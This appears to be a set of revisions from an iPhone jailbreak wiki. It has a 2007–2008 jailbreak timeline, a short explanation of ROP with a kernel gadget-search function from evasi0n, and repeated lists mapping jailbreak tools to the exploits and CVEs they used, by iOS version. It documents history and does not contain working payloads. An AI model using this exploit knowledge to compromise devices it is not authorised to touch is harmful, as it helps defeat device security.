* 9 September -- Apple releases [[iOS|iPhone OS]] 2.1. [[N72AP|iPod touch (2nd generation)]], which no longer had the [[Pwnage 2.0]] exploit, is revealed.

=== August ===
* 18 August -- Apple releases [[iOS|iPhone OS]] 2.0.2. [[iPhone Dev Team]] releases [http://wikee.iphwn.org/news:pwnage20announcement QuickPwn], a 2.x [[pwnage]]/ramdisk combination exploit that allows jailbreaking without needing to create custom IPSWs.
* 4 August -- Apple releases [[iOS|iPhone OS]] 2.0.1.

=== July ===
* 22 July -- [[TA_Mobile]] hardware dumps the 3G baseband (bootloader 5.8 & FW 1.45.00) by desoldering the [[NOR]].
* 19 July -- [[iPhone Dev Team]] releases [[PwnageTool]] 2.0, jailbreaking and unlocking the 2.0 software on the [[M68AP|iPhone]] and jailbreaking [[iOS|iPhone OS]] 2.0 on the [[N82AP|iPhone 3G]] and [[N45AP|iPod touch]].
* 15 July -- Apple releases [[iOS|iPhone OS]] 1.1.5 for the [[N45AP|iPod touch]].
* 11 July -- [[N82AP|iPhone 3G]] is released. Apple also releases [[iOS|iPhone OS]] 2.0 and MobileMe on the same date, resulting in server issues.

=== June ===
* 9 June - [[N82AP|iPhone 3G]] is announced at [[WWDC]] '08.

=== April ===
* 3 April -- [[iPhone Dev Team]] releases [[PwnageTool]] 1.0, making use of the [[pmdx exploit]] (to patch RSA checks out of the [[kernel]], to write unsigned to [[NOR]])

=== March ===
* 12 March -- [[iPhone Dev Team]] releases dual-boot jailbreak method, only to be silently fixed in 2.0.
* 4 March -- [[User:n0b|George Zhu (n000b)]] releases [[iLiberty+|iLiberty / iLiberty+]].

=== February ===
* 28 February -- [[Cydia Application|Cydia]] is released as an open-source alternative to [[Installer.app]], and prepares to take over the jailbreak application scene upon 2.0's release.
* 26 February -- Apple releases [[iOS|iPhone OS]] 1.1.4.
* 11 February -- [[User:Zibri|Zibri]] leaks the [[Ramdisk Hack]] in [[ZiPhone]], the first all-in-one unlock, activate, jailbreak solution.
* 8 February -- [[User:Geohot|geohot]] releases software unlock for 4.6. Apple states 25% of phones were never activated with AT&T.

=== January ===
* 28 January -- [[iPhone Dev Team]] releases [[Soft Upgrade]] jailbreak for 1.1.3.
* 24 January -- [[Nate True]] releases a version of [[iBrickr]] that used the [[Soft Upgrade]] method to jailbreak 1.1.3.
* 18 January -- [[User:Geohot|Geohot]] and his friends [http://iphonejtag.blogspot.com/2008/01/112-otb-unlocked.html unlocked 1.1.2 OTB 4.6 by test point], the unbeatable version at that time.
* 18 January -- [[iPhone Dev Team]] posts YouTube video of a jailbroken 1.1.3, which was made possible by the dual boot jailbreak from [[bgm]].
* 15 January -- Apple releases [[iOS|iPhone OS]] 1.1.3, closing the [[mknod]] exploit. In addition, everything now runs as "mobile" instead of "root."

== 2007 ==
=== November ===
* 15 November -- [[Baseband Bootloader|Baseband bootloader]] 4.6 is found on new [[M68AP|iPhone]] devices, which initially had no [[unlock]].
* 12 November -- Apple releases [[iOS|iPhone OS]] 1.1.2, closing the [[LibTiff]] and [[Symlinks]] exploits.
* 2 November -- [[JailbreakMe|AppSnapp]] is released, bringing jailbreaking to the mainstream iPhone user.

=== October ===
* 23 October -- iPhone-Elite Team releases the [[Virginizer]].
* 14 October -- [[User:AriX|AriX]] releases iJailBreak, the first automated [[N45AP|iPod touch]] jailbreak for the Mac.
* 12 October -- [[User:planetbeing|planetbeing]] releases [[touchFree]], the first automated [[N45AP|iPod touch]] [[jailbreak]].
* 10 October -- [[cmw]] (aka Niacin) and Dre release the LibTiff exploit to jailbreak the [[N45AP|iPod touch]], which is later adapted for use in [[JailbreakMe|AppSnapp]].

=== September ===
* 27 September -- Apple releases [[iOS|iPhone OS]] 1.1.1.
* 11 September -- [[iPhone Dev Team]] releases [[iUnlock]], first free software unlock.
* 10 September -- [[IPSF]] releases first paid software unlock.
* 9 September -- Apple announces the [[N45AP|iPod touch]] at a media event.

=== August ===
* 23 August -- [[User:Geohot|geohot]] and team release [[hardware unlock]] method.
* 21 August -- [[Installer.app]] is released by Nullriver, first GUI apps are distributed.

=== July ===
* 23 July -- First phones are used with other carriers by means of [[SIM hacks]].
* 20 July -- nightwatch adapts a [[toolchain]] to the iPhone. The first apps are compiled.
* 9 July -- [[iPhone Dev Team]] releases a [[jailbreak]] method. The first use of this is ringtones.
* 3 July -- DVD Jon first cracks [[activation]]. People can use the apps on the phone without a subscription.

=== June ===
* 29 June -- [[M68AP|iPhone]] is released. World's most hyped consumer product.
* 26 June -- The [[iPhone Dev Team]] was formed.

=== January ===
* 9 January -- [[M68AP|iPhone]] is announced on stage by Steve Jobs.

Bootrom 1413.8

2021-06-12T19:42:18Z

Inflatable Man: Added that the Haywire's BootROM is vulnerable to checkm8

This is the [[bootrom]] version used for [[Haywire]]. It is vulnerable to [[checkm8]].

{{stub}}
[[Category:Bootrom]]

ROP

2021-06-10T16:30:11Z

Inflatable Man: Fixes typo and adds comma

ROP is a form of exploitation where you search for gadgets in memory (instructions bascially)
and use memory's own code instead of using your code. In evasi0n, this ROP gadget is used
STR R1, [R2];BX LR
So evasi0n looks for that in memory using memmem(), here's the function in planetbeing's
patchfinder.

int32_t find_str_r1_r2_bx_lr(uint32_t region, uint8_t* kdata, size_t ksize)
{
const uint8_t search[] = {0x11, 0x60, 0x70, 0x47};
void* ptr = memmem(kdata, ksize, search, sizeof(search)) + 1;
if(!ptr)
return 0;
return ((uintptr_t)ptr) - ((uintptr_t)kdata);
}
Once you've figured out all your ROP gadgets, that's your payload and that's how you will
exploit whatever vulnerability you found.

Jailbreak Exploits

2021-05-13T01:21:50Z

Inflatable Man: /* Programs used to jailbreak 12.x */ Updated iOS 12 versions

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]]
* [[Timezone Vulnerability]] ({{cve|2013-0979}})
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.5.3)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.5.3)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.5.3

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.5.3)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.6 beta)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

===[[unc0ver]] (14.0 - 14.3)===

* ivac entry use-after-free ({{cve|2021-1782}})

Jailbreak Exploits

2021-05-13T01:17:55Z

Inflatable Man: /* checkra1n (14.0 - 14.6 beta) */ Updated title of section to include recent iOS versions

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

